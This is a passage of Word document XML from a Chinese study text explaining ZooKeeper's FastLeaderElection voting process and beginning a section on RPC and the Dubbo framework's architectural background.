      <w:r w:rsidR="00CD38B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="00905EB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ookeeper</w:t>
      </w:r>
      <w:r w:rsidR="00905EB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现了</w:t>
      </w:r>
      <w:r w:rsidR="00905EB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00905EB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种选举算法</w:t>
      </w:r>
      <w:r w:rsidR="00A00125">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00905EB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认采用</w:t>
      </w:r>
      <w:r w:rsidR="00CD38B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FastLeaderElection(Fast Paxos</w:t>
      </w:r>
      <w:r w:rsidR="00CD38B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法具体实现</w:t>
      </w:r>
      <w:r w:rsidR="00CD38B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A00728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00196F3C" w:rsidRDefault="00B97189" w:rsidP="00005E8E">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选举开始时，每个节点为自己生成一张投票，推荐自己成为</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并把投票发送给其他节点，这相当于</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>paxos</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法中的</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proposer</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>角色。接下来，节点启动一个接收线程接收其他节点发送过来的投票，并对选票进行处理，这相当于</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>paxos</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>acceptor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>角色。</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单的说，节点之间通过这种消息发送（投票），最终选举出</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005E8E" w:rsidRPr="00196F3C" w:rsidRDefault="00B97189" w:rsidP="00005E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00005E8E" w:rsidRPr="00196F3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>发送线程用于向其他节点发送本节点的投票信息，接受线程用于从其他节点接受投票信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005E8E" w:rsidRPr="00196F3C" w:rsidRDefault="00005E8E" w:rsidP="00005E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196F3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>LinkedBlockingQueue&lt;ToSend&gt; sendqueue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005E8E" w:rsidRPr="00196F3C" w:rsidRDefault="00005E8E" w:rsidP="00005E8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196F3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>LinkedBlockingQueue&lt;Notification&gt; recvqueue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97189" w:rsidRDefault="00005E8E" w:rsidP="00B97189">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196F3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00196F3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>第一个队列是发送选票的队列，用于向其他节点发送本节点的选票消息；第二个队列是接收队列，用于接收其他节点发来的选票消息。</w:t>
      </w:r>
      <w:r w:rsidR="00B97189">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97189" w:rsidRDefault="00B97189" w:rsidP="00B97189">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当收到其他节点的选票之后，会和自己的投票比较，如果比自己的投票好（比如推荐的</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更大，选举轮数更新），则更新自己的选票，接下来把收到的选票放在选票列表里（该列表存储了所有节点的投票，是一个</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>key-value</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构，</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为节点的</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为该节点的投票）。并再次把自己的投票发送给其他节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97189" w:rsidRDefault="00B97189" w:rsidP="00B97189">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来节点会统计选票列表中每个节点获得的票数，如果有一个节点</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得超过半数的选票，则认为该节点是</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果本节点就是</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则将自身的状态置为</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leading</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，表明自己是</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；否则将自己的状态置为</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，表明自己是</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2501" w:rsidRPr="00B97189" w:rsidRDefault="00B97189" w:rsidP="00B97189">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过若干轮的消息交换，最终，会有一个节点获得超过一半的选票而成为</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这种方法的精髓在于，每个节点在不需要获得所有节点的信息（投票结果）的前提下，达成一致意见，选出</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="00EE2501">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00905EB4" w:rsidRPr="00EE2501" w:rsidRDefault="00905EB4" w:rsidP="009F2F61">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC278D" w:rsidRPr="00977864" w:rsidRDefault="00D44C30" w:rsidP="009F2F61">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00686626" w:rsidRPr="00977864">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>心跳同步</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC278D" w:rsidRDefault="00DC278D" w:rsidP="009F2F61">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00015F1E" w:rsidRPr="003E274D" w:rsidRDefault="008C70AB" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>完成选举后，就开始进入到心跳同步过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00323ECF" w:rsidRPr="00F41A4C" w:rsidRDefault="00C5505E" w:rsidP="00323ECF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00323ECF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidR="00947172" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004149CD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidR="00323ECF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00323ECF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00323ECF" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB1B40" w:rsidP="00B74E62">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dubbo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="005A2F10">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>远程程序调用</w:t>
      </w:r>
      <w:r w:rsidR="007C11C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Alibaba</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的分布式服务框架，提供高性能和透明化的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>远程服务调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>方案。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="00483319" w:rsidP="00483319">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="008C0670" w:rsidRPr="00F41A4C">
        <w:t>.4.1</w:t>
      </w:r>
      <w:r w:rsidR="00E56C54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:t>背景介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00BC7C07">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="260" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>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随着互联网的发展，网站应用的规模不断扩大，常规的垂直应用架构已无法应对，分布式服务架构以及流动计算架构势在必行，亟需一个治理系统确保架构有条不紊的演进。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00BC7C07">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="260" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5371816" cy="1997196"/>
            <wp:effectExtent l="19050" t="0" r="284" b="0"/>
            <wp:docPr id="44" name="图片 2" descr="http://dubbo.io/dubbo-architecture-roadmap.jpg-version=1&amp;modificationDate=13311436660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dubbo.io/dubbo-architecture-roadmap.jpg-version=1&amp;modificationDate=1331143666000.jpg"/>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5371492" cy="1997075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>单一应用架构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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当网站流量很小时，只需一个应用，将所有功能都部署在一起，以减少部署节点和成本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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此时，用于简化增删改查工作量的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>数据访问框架</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(ORM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>是关键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>垂直应用架构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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当访问量逐渐增大，单一应用增加机器带来的加速度越来越小，将应用拆成互不相干的几个应用，以提升效率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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此时，用于加速前端页面开发的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
